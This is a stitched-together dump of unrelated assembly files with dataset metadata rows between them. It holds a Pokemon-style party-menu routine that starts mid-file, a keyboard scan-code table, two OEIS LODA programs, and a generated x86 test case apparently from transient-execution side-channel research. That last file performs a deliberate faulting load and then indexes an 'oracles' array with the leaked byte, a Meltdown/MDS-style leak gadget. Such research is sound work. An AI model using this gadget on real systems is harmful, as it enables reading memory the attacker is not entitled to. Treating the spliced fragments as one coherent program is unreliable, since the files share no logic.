ld a, b
ld bc, PARTYMON_STRUCT_LENGTH
ld hl, wPartyMon1HP
call AddNTimes
ld a, [hli]
or [hl]
jr nz, .not_fainted
xor a
ld e, a
ld c, a
ret
.not_fainted
dec hl
ld a, [hli]
ld b, a
ld a, [hli]
ld c, a
ld a, [hli]
ld d, a
ld a, [hli]
ld e, a
predef ComputeHPBarPixels
ret
PlacePartyMenuHPDigits:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 13, 1
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
push hl
ld a, b
ld bc, PARTYMON_STRUCT_LENGTH
ld hl, wPartyMon1HP
call AddNTimes
ld e, l
ld d, h
pop hl
push de
lb bc, 2, 3
call PrintNum
pop de
ld a, "/"
ld [hli], a
inc de
inc de
lb bc, 2, 3
call PrintNum
.next
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
PlacePartyMonLevel:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 8, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
push hl
ld a, b
ld bc, PARTYMON_STRUCT_LENGTH
ld hl, wPartyMon1Level
call AddNTimes
ld e, l
ld d, h
pop hl
ld a, [de]
cp 100 ; This is distinct from MAX_LEVEL.
jr nc, .ThreeDigits
ld a, "<LV>"
ld [hli], a
lb bc, PRINTNUM_RIGHTALIGN | 1, 2
; jr .okay
.ThreeDigits:
lb bc, PRINTNUM_RIGHTALIGN | 1, 3
; .okay
call PrintNum
.next
pop hl
ld de, SCREEN_WIDTH * 2
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
PlacePartyMonStatus:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 5, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
push hl
ld a, b
ld bc, PARTYMON_STRUCT_LENGTH
ld hl, wPartyMon1Status
call AddNTimes
ld e, l
ld d, h
pop hl
call PlaceStatusString
.next
pop hl
ld de, SCREEN_WIDTH * 2
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
PlacePartyMonTMHMCompatibility:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 12, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
push hl
ld hl, wPartySpecies
ld e, b
ld d, 0
add hl, de
ld a, [hl]
ld [wCurPartySpecies], a
predef CanLearnTMHMMove
pop hl
call .PlaceAbleNotAble
call PlaceString
.next
pop hl
ld de, SCREEN_WIDTH * 2
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
.PlaceAbleNotAble:
ld a, c
and a
jr nz, .able
ld de, .string_not_able
ret
.able
ld de, .string_able
ret
.string_able
db "ABLE@"
.string_not_able
db "NOT ABLE@"
PlacePartyMonEvoStoneCompatibility:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 12, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
push hl
ld a, b
ld [wCurPartyMon], a
ld bc, PARTYMON_STRUCT_LENGTH
ld hl, wPartyMon1Species
call AddNTimes
ld a, [hl]
ld [wCurPartySpecies], a
call GetPokemonIndexFromID
ld b, h
ld c, l
ld hl, EvosAttacksPointers
ld a, BANK(EvosAttacksPointers)
call LoadDoubleIndirectPointer
ld d, h
ld e, l
xor a
ld [wMonType], a
farcall DetermineEvolutionItemResults
ld a, d
or e
ld de, .string_not_able
jr z, .got_string
ld de, .string_able
.got_string
pop hl
call PlaceString
.next
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
.string_able
db "ABLE@"
.string_not_able
db "NOT ABLE@"
PlacePartyMonGender:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 12, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .next
ld [wCurPartySpecies], a
push hl
ld a, b
ld [wCurPartyMon], a
xor a
ld [wMonType], a
call GetGender
ld de, .unknown
jr c, .got_gender
ld de, .male
jr nz, .got_gender
ld de, .female
.got_gender
pop hl
call PlaceString
.next
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ret
.male
db "♂…MALE@"
.female
db "♀…FEMALE@"
.unknown
db "…UNKNOWN@"
PlacePartyMonMobileBattleSelection:
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 12, 1
.loop
push bc
push hl
ld de, .String_Sanka_Shinai
call PlaceString
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ld a, l
ld e, MON_NAME_LENGTH
sub e
ld l, a
ld a, h
sbc $0
ld h, a
ld de, .String_Kettei_Yameru
call PlaceString
ld b, $3
ld c, $0
ld hl, wd002
ld a, [hl]
.loop2
push hl
push bc
hlcoord 12, 1
.loop3
and a
jr z, .done
ld de, 2 * SCREEN_WIDTH
add hl, de
dec a
jr .loop3
.done
ld de, .String_Banme
push hl
call PlaceString
pop hl
pop bc
push bc
push hl
ld a, c
ld hl, .Strings_1_2_3
call GetNthString
ld d, h
ld e, l
pop hl
call PlaceString
pop bc
pop hl
inc hl
ld a, [hl]
inc c
dec b
ret z
jr .loop2
.String_Banme:
db " ばんめ @" ; Place
.String_Sanka_Shinai:
db "さんかしない@" ; Cancel
.String_Kettei_Yameru:
db "けってい やめる@" ; Quit
.Strings_1_2_3:
db "1@", "2@", "3@" ; 1st, 2nd, 3rd
PartyMenuCheckEgg:
ld a, LOW(wPartySpecies)
add b
ld e, a
ld a, HIGH(wPartySpecies)
adc 0
ld d, a
ld a, [de]
cp EGG
ret
GetPartyMenuQualityIndexes:
ld a, [wPartyMenuActionText]
and $f0
jr nz, .skip
ld a, [wPartyMenuActionText]
and $f
ld e, a
ld d, 0
ld hl, PartyMenuQualityPointers
add hl, de
add hl, de
ld a, [hli]
ld h, [hl]
ld l, a
ret
.skip
ld hl, PartyMenuQualityPointers.Default
ret
INCLUDE "data/party_menu_qualities.asm"
InitPartyMenuGFX:
ld hl, wPartyCount
ld a, [hli]
and a
ret z
ld c, a
xor a
ldh [hObjectStructIndexBuffer], a
.loop
push bc
push hl
ld hl, LoadMenuMonIcon
ld a, BANK(LoadMenuMonIcon)
ld e, MONICON_PARTYMENU
rst FarCall
ldh a, [hObjectStructIndexBuffer]
inc a
ldh [hObjectStructIndexBuffer], a
pop hl
pop bc
dec c
jr nz, .loop
callfar PlaySpriteAnimations
ret
InitPartyMenuWithCancel:
; with cancel
xor a
ld [wSwitchMon], a
ld de, PartyMenuAttributes
call SetMenuAttributes
ld a, [wPartyCount]
inc a
ld [w2DMenuNumRows], a ; list length
dec a
ld b, a
ld a, [wPartyMenuCursor]
and a
jr z, .skip
inc b
cp b
jr c, .done
.skip
ld a, 1
.done
ld [wMenuCursorY], a
ld a, A_BUTTON | B_BUTTON
ld [wMenuJoypadFilter], a
ret
InitPartyMenuNoCancel:
; no cancel
ld de, PartyMenuAttributes
call SetMenuAttributes
ld a, [wPartyCount]
ld [w2DMenuNumRows], a ; list length
ld b, a
ld a, [wPartyMenuCursor]
and a
jr z, .skip
inc b
cp b
jr c, .done
.skip
ld a, 1
.done
ld [wMenuCursorY], a
ld a, A_BUTTON | B_BUTTON
ld [wMenuJoypadFilter], a
ret
PartyMenuAttributes:
; cursor y
; cursor x
; num rows
; num cols
; bit 6: animate sprites bit 5: wrap around
; ?
; distance between items (hi: y, lo: x)
; allowed buttons (mask)
db 1, 0
db 0, 1
db $60, $00
dn 2, 0
db 0
PartyMenuSelect:
; sets carry if exitted menu.
call StaticMenuJoypad
call PlaceHollowCursor
ld a, [wPartyCount]
inc a
ld b, a
ld a, [wMenuCursorY] ; menu selection?
cp b
jr z, .exitmenu ; CANCEL
ld [wPartyMenuCursor], a
ldh a, [hJoyLast]
ld b, a
bit B_BUTTON_F, b
jr nz, .exitmenu ; B button
ld a, [wMenuCursorY]
dec a
ld [wCurPartyMon], a
ld c, a
ld b, $0
ld hl, wPartySpecies
add hl, bc
ld a, [hl]
ld [wCurPartySpecies], a
ld de, SFX_READ_TEXT_2
call PlaySFX
call WaitSFX
and a
ret
.exitmenu
ld de, SFX_READ_TEXT_2
call PlaySFX
call WaitSFX
scf
ret
PrintPartyMenuText:
hlcoord 0, 14
lb bc, 2, 18
call Textbox
ld a, [wPartyCount]
and a
jr nz, .haspokemon
ld de, YouHaveNoPKMNString
jr .gotstring
.haspokemon
ld a, [wPartyMenuActionText]
and $f ; drop high nibble
ld hl, PartyMenuStrings
ld e, a
ld d, $0
add hl, de
add hl, de
ld a, [hli]
ld d, [hl]
ld e, a
.gotstring
ld a, [wOptions]
push af
set NO_TEXT_SCROLL, a
ld [wOptions], a
hlcoord 1, 16 ; Coord
call PlaceString
pop af
ld [wOptions], a
ret
PartyMenuStrings:
dw ChooseAMonString
dw UseOnWhichPKMNString
dw WhichPKMNString
dw TeachWhichPKMNString
dw MoveToWhereString
dw UseOnWhichPKMNString
dw ChooseAMonString ; Probably used to be ChooseAFemalePKMNString
dw ChooseAMonString ; Probably used to be ChooseAMalePKMNString
dw ToWhichPKMNString
dw NULL
dw ChooseAMonString
ChooseAMonString:
db "Choose a #MON.@"
UseOnWhichPKMNString:
db "Use on which <PK><MN>?@"
WhichPKMNString:
db "Which <PK><MN>?@"
TeachWhichPKMNString:
db "Teach which <PK><MN>?@"
MoveToWhereString:
db "Move to where?@"
ChooseAFemalePKMNString:
; unused
db "Choose a ♀<PK><MN>.@"
ChooseAMalePKMNString:
; unused
db "Choose a ♂<PK><MN>.@"
ToWhichPKMNString:
db "To which <PK><MN>?@"
YouHaveNoPKMNString:
db "You have no <PK><MN>!@"
PrintPartyMenuActionText:
ld a, [wCurPartyMon]
ld hl, wPartyMonNicknames
call GetNick
ld a, [wPartyMenuActionText]
and $f
ld hl, .MenuActionTexts
call .PrintText
ret
.MenuActionTexts:
; entries correspond to PARTYMENUTEXT_* constants
dw .Text_CuredOfPoison
dw .Text_BurnWasHealed
dw .Text_Defrosted
dw .Text_WokeUp
dw .Text_RidOfParalysis
dw .Text_RecoveredSomeHP
dw .Text_HealthReturned
dw .Text_Revitalized
dw .Text_GrewToLevel
dw .Text_CameToItsSenses
.Text_RecoveredSomeHP:
; recovered @ HP!
text_far _RecoveredSomeHPText
text_end
.Text_CuredOfPoison:
; 's cured of poison.
text_far _CuredOfPoisonText
text_end
.Text_RidOfParalysis:
; 's rid of paralysis.
text_far _RidOfParalysisText
text_end
.Text_BurnWasHealed:
; 's burn was healed.
text_far _BurnWasHealedText
text_end
.Text_Defrosted:
; was defrosted.
text_far _WasDefrostedText
text_end
.Text_WokeUp:
; woke up.
text_far _WokeUpText
text_end
.Text_HealthReturned:
; 's health returned.
text_far _HealthReturnedText
text_end
.Text_Revitalized:
; is revitalized.
text_far _RevitalizedText
text_end
.Text_GrewToLevel:
; grew to level @ !@ @
text_far _GrewToLevelText
text_end
.Text_CameToItsSenses:
; came to its senses.
text_far _CameToItsSensesText
text_end
.PrintText:
ld e, a
ld d, 0
add hl, de
add hl, de
ld a, [hli]
ld h, [hl]
ld l, a
ld a, [wOptions]
push af
set NO_TEXT_SCROLL, a
ld [wOptions], a
call PrintText
pop af
ld [wOptions], a
ret
SelectFormChangeMon:
ld a, PARTYMENUACTION_CHANGE_FORM
ld [wPartyMenuActionText], a
call DisableSpriteUpdates
call ClearBGPalettes
call InitPartyMenuLayout
call WaitBGMap
call SetPalettes
call DelayFrame
call PartyMenuSelect
ret
| 14.473318 | 66 | 0.71345 |
09f14aeea1c984e8bad1d952403cc41efc02c683 | 3,424 | asm | Assembly | 45/beef/drv/kbd/src/tables5.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/beef/drv/kbd/src/tables5.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/beef/drv/kbd/src/tables5.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | ;*
;* CW : Character Windows Drivers
;*
;* tables5.asm : OS/2 tables for key lookup
;*****************************************************************************
;* Adapted from PM "atvkey.asm"
;* Copyright (C) 1987 by Microsoft Inc.
;* Adaptations include:
;* change to old windows VK names
;* compact everything to 1 byte
;* removal of general tables
;************************************************************************
NormalTranslateTable:
DB 5 ; #scan code ranges
DB 01h ; first scan code in range
DB 01h ; last scan code in range
DB VwOfVk VK_ESCAPE ; 01h Esc
if 0 ; No translation for these
DB XL_NOXLATE ; 02h 1
DB XL_NOXLATE ; 03h 2
DB XL_NOXLATE ; 04h 3
DB XL_NOXLATE ; 05h 4
DB XL_NOXLATE ; 06h 5
DB XL_NOXLATE ; 07h 6
DB XL_NOXLATE ; 08h 7
DB XL_NOXLATE ; 09h 8
DB XL_NOXLATE ; 0Ah 9
DB XL_NOXLATE ; 0Bh 0
DB XL_NOXLATE ; 0Ch -
DB XL_NOXLATE ; 0Dh =
endif
DB 0Eh ; first scan code in range
DB 0Fh ; last scan code in range
DB VwOfVk VK_BACK ; 0Eh Backspace
DB VwOfVk VK_TAB ; 0Fh Tab
if 0 ; No translation for these
DB XL_NOXLATE ; 10h Q
DB XL_NOXLATE ; 11h W
DB XL_NOXLATE ; 12h E
DB XL_NOXLATE ; 13h R
DB XL_NOXLATE ; 14h T
DB XL_NOXLATE ; 15h Y
DB XL_NOXLATE ; 16h U
DB XL_NOXLATE ; 17h I
DB XL_NOXLATE ; 18h O
DB XL_NOXLATE ; 19h P
DB XL_NOXLATE ; 1Ah [
DB XL_NOXLATE ; 1Bh ]
endif
DB 1Ch ; first scan code in range
DB 1Ch ; last scan code in range
DB VwOfVk VK_RETURN ; 1Ch Enter
if 0 ; No translation for these
DB VwOfVk VK_CONTROL ; 1Dh Ctrl
DB XL_NOXLATE ; 1Eh A
DB XL_NOXLATE ; 1Fh S
DB XL_NOXLATE ; 20h D
DB XL_NOXLATE ; 21h F
DB XL_NOXLATE ; 22h G
DB XL_NOXLATE ; 23h H
DB XL_NOXLATE ; 24h J
DB XL_NOXLATE ; 25h K
DB XL_NOXLATE ; 26h L
DB XL_NOXLATE ; 27h ;
DB XL_NOXLATE ; 28h '
DB XL_NOXLATE ; 29h `
endif
DB 2Ah ; first scan code in range
DB 2Ah ; last scan code in range
DB VwOfVk VK_SHIFT ; 2Ah Left Shift
if 0 ; No translation for these
DB XL_NOXLATE ; 2Bh \
DB XL_NOXLATE ; 2Ch Z
DB XL_NOXLATE ; 2Dh X
DB XL_NOXLATE ; 2Eh C
DB XL_NOXLATE ; 2Fh V
DB XL_NOXLATE ; 30h B
DB XL_NOXLATE ; 31h N
DB XL_NOXLATE ; 32h M
DB XL_NOXLATE ; 33h ,
DB XL_NOXLATE ; 34h .
endif
DB 35h ; first scan code in range
DB 54h ; last scan code in range
DB VwOfVk VK_DIVIDE ; 35h /
DB VwOfVk VK_SHIFT ; 36h Right Shift
DB VwOfVk VK_PRINT ; 37h PrtSc
DB VwOfVk VK_MENU ; 38h Alt
DB VwOfVk VK_SPACE ; 39h Space
DB VwOfVk VK_CAPLOCK ; 3Ah Caps Lock
DB VwOfVk VK_F1 ; 3Bh F1
DB VwOfVk VK_F2 ; 3Ch F2
DB VwOfVk VK_F3 ; 3Dh F3
DB VwOfVk VK_F4 ; 3Eh F4
DB VwOfVk VK_F5 ; 3Fh F5
DB VwOfVk VK_F6 ; 40h F6
DB VwOfVk VK_F7 ; 41h F7
DB VwOfVk VK_F8 ; 42h F8
DB VwOfVk VK_F9 ; 43h F9
DB VwOfVk VK_F10 ; 44h F10
DB VwOfVk VK_NUMLOCK ; 45h Num Lock
DB VwOfVk VK_SCRLOCK ; 46h Scroll Lock
DB VwOfVk VK_HOME ; 47h Home
DB VwOfVk VK_UP ; 48h Up
DB VwOfVk VK_PRIOR ; 49h PgUp
DB VwOfVk VK_SUBTRACT ; 4Ah Minus
DB VwOfVk VK_LEFT ; 4Bh Left
DB VwOfVk VK_NUMPAD5 ; 4Ch numpad-5
DB VwOfVk VK_RIGHT ; 4Dh Right
DB VwOfVk VK_MULTIPLY ; 4Eh Multiply
DB VwOfVk VK_END ; 4Fh End
DB VwOfVk VK_DOWN ; 50h Down
DB VwOfVk VK_NEXT ; 51h PgDn
DB VwOfVk VK_INSERT ; 52h Ins
DB VwOfVk VK_DELETE ; 53h Del
DB VwOfVk VK_CANCEL ; 54h Sys Req
;* * end of normal table
;*****************************************************************************
| 26.137405 | 78 | 0.642815 |
d587f5645a73a9f7b6c4c1b7739b1b7113d35c51 | 326 | asm | Assembly | oeis/083/A083426.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/083/A083426.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/083/A083426.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A083426: (4*7^n+2^n)/5.
; Submitted by Jamie Morken(s1)
; 1,6,40,276,1924,13452,94132,658860,4611892,32282988,225980404,1581861804,11073030580,77511209964,542578461556,3798049214508,26586344468788,186104411215980,1302730878380788,9119116148403372
mov $1,7
pow $1,$0
mul $1,4
mov $2,2
pow $2,$0
add $1,$2
mov $0,$1
div $0,5
| 25.076923 | 190 | 0.754601 |
a59e8a3a15406009e40d0fb64ee50f175d839fb5 | 416 | asm | Assembly | oeis/205/A205184.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/205/A205184.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/205/A205184.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A205184: Period 12: repeat (1, 8, 4, 9, 7, 8, 7, 9, 4, 8, 1, 9).
; Submitted by Jamie Morken(s3)
; 1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8,4,9,7,8,7,9,4,8,1,9,1,8
seq $0,115598 ; Consider all Pythagorean triples (X,X+1,Z) ordered by increasing Z; sequence gives Z-(X+1) values.
sub $0,1
mod $0,9
add $0,1
| 46.222222 | 173 | 0.584135 |
ceba6f12b5e26ce90571808c68feedb86e005eef | 304 | asm | Assembly | programs/oeis/051/A051067.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/051/A051067.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/051/A051067.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A051067: A051066 read mod 2.
; 0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,1,1,0,0,1,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1
cal $0,122250 ; Partial sums of A004128.
mod $0,2
mov $1,$0
| 43.428571 | 211 | 0.549342 |
7a05eedd72179082a15cfeebbb371cddecca344e | 9,245 | asm | Assembly | Transynther/x86/_processed/NC/_st_zr_4k_sm_/i3-7100_9_0x84_notsx.log_21829_2010.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_st_zr_4k_sm_/i3-7100_9_0x84_notsx.log_21829_2010.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_st_zr_4k_sm_/i3-7100_9_0x84_notsx.log_21829_2010.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %r15
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0xf57f, %rsi
lea addresses_UC_ht+0x9ecf, %rdi
nop
nop
nop
nop
inc %r14
mov $101, %rcx
rep movsb
and $1978, %rax
lea addresses_WC_ht+0x1157f, %r15
nop
nop
nop
nop
nop
add $16515, %rcx
movups (%r15), %xmm6
vpextrq $0, %xmm6, %rax
nop
nop
nop
nop
nop
sub $7941, %rcx
lea addresses_normal_ht+0xfa0f, %rsi
lea addresses_WC_ht+0x7e0f, %rdi
nop
nop
xor %rdx, %rdx
mov $115, %rcx
rep movsq
nop
nop
nop
inc %r14
lea addresses_WC_ht+0x197f, %rsi
lea addresses_A_ht+0x1ca3f, %rdi
nop
nop
nop
nop
nop
xor %r10, %r10
mov $102, %rcx
rep movsq
nop
and $48786, %r10
lea addresses_WC_ht+0x1657f, %r10
clflush (%r10)
nop
nop
nop
dec %r14
movups (%r10), %xmm6
vpextrq $1, %xmm6, %r15
nop
nop
cmp %r15, %r15
lea addresses_D_ht+0x6fa7, %rsi
nop
inc %r10
mov (%rsi), %edi
dec %rdi
lea addresses_WC_ht+0x1f3f, %rdx
nop
nop
cmp $4816, %r14
movb (%rdx), %r15b
nop
nop
dec %rsi
lea addresses_A_ht+0x81df, %rcx
nop
nop
nop
nop
nop
inc %rdi
mov $0x6162636465666768, %r14
movq %r14, %xmm2
and $0xffffffffffffffc0, %rcx
movaps %xmm2, (%rcx)
and %rdx, %rdx
lea addresses_A_ht+0x1257f, %r10
nop
nop
nop
add %rsi, %rsi
and $0xffffffffffffffc0, %r10
movntdqa (%r10), %xmm1
vpextrq $1, %xmm1, %r15
nop
nop
nop
nop
inc %rcx
lea addresses_WT_ht+0x47f, %rsi
lea addresses_WT_ht+0x9bdf, %rdi
cmp %rdx, %rdx
mov $117, %rcx
rep movsw
and %rdx, %rdx
lea addresses_normal_ht+0xbe22, %rsi
lea addresses_A_ht+0x1267f, %rdi
nop
nop
xor $35986, %rax
mov $47, %rcx
rep movsb
nop
xor %rax, %rax
lea addresses_D_ht+0x1d20b, %r15
nop
nop
nop
xor $21039, %rcx
mov $0x6162636465666768, %rdi
movq %rdi, %xmm0
movups %xmm0, (%r15)
sub $34692, %rsi
lea addresses_A_ht+0x851f, %rdi
nop
nop
xor $28042, %r14
mov (%rdi), %eax
nop
nop
nop
dec %r15
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r15
pop %r14
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r15
push %r8
push %r9
push %rbp
push %rdi
// Store
lea addresses_WT+0x16d7f, %r13
nop
cmp $35779, %rdi
movw $0x5152, (%r13)
// Exception!!!
nop
nop
mov (0), %r13
nop
nop
cmp %rbp, %rbp
// Store
mov $0x250de60000000bff, %r13
nop
nop
nop
nop
xor %rdi, %rdi
mov $0x5152535455565758, %r12
movq %r12, %xmm0
vmovups %ymm0, (%r13)
nop
add %rdi, %rdi
// Store
lea addresses_WT+0x14bab, %r13
nop
nop
nop
and $23453, %rbp
mov $0x5152535455565758, %rdi
movq %rdi, %xmm5
vmovups %ymm5, (%r13)
sub $37112, %rbp
// Store
lea addresses_D+0x1737f, %r8
clflush (%r8)
nop
nop
nop
nop
dec %r9
mov $0x5152535455565758, %r15
movq %r15, %xmm7
vmovups %ymm7, (%r8)
nop
nop
nop
nop
nop
xor %r12, %r12
// Store
lea addresses_WT+0x757f, %r8
nop
nop
nop
nop
xor %rdi, %rdi
mov $0x5152535455565758, %rbp
movq %rbp, %xmm5
movups %xmm5, (%r8)
nop
nop
sub $61838, %r15
// Store
lea addresses_RW+0x18885, %rdi
nop
dec %r12
movb $0x51, (%rdi)
nop
nop
nop
nop
and %r9, %r9
// Store
mov $0x6256630000000d7f, %r15
nop
and %rbp, %rbp
mov $0x5152535455565758, %rdi
movq %rdi, %xmm1
vmovups %ymm1, (%r15)
nop
nop
nop
nop
inc %r15
// Faulty Load
mov $0x6256630000000d7f, %rbp
nop
nop
cmp %r12, %r12
movb (%rbp), %r8b
lea oracles, %r9
and $0xff, %r8
shlq $12, %r8
mov (%r9,%r8,1), %r8
pop %rdi
pop %rbp
pop %r9
pop %r8
pop %r15
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_NC', 'same': False, 'size': 4, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WT', 'same': False, 'size': 2, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_NC', 'same': False, 'size': 32, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WT', 'same': False, 'size': 32, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_D', 'same': False, 'size': 32, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WT', 'same': False, 'size': 16, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_RW', 'same': False, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_NC', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_NC', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 16, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WC_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 16, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'same': False, 'size': 4, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 1, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 16, 'congruent': 5, 'NT': True, 'AVXalign': True}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 16, 'congruent': 3, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'}
{'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 16, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': True, 'size': 4, 'congruent': 5, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'00': 934, '58': 20865, '52': 30}
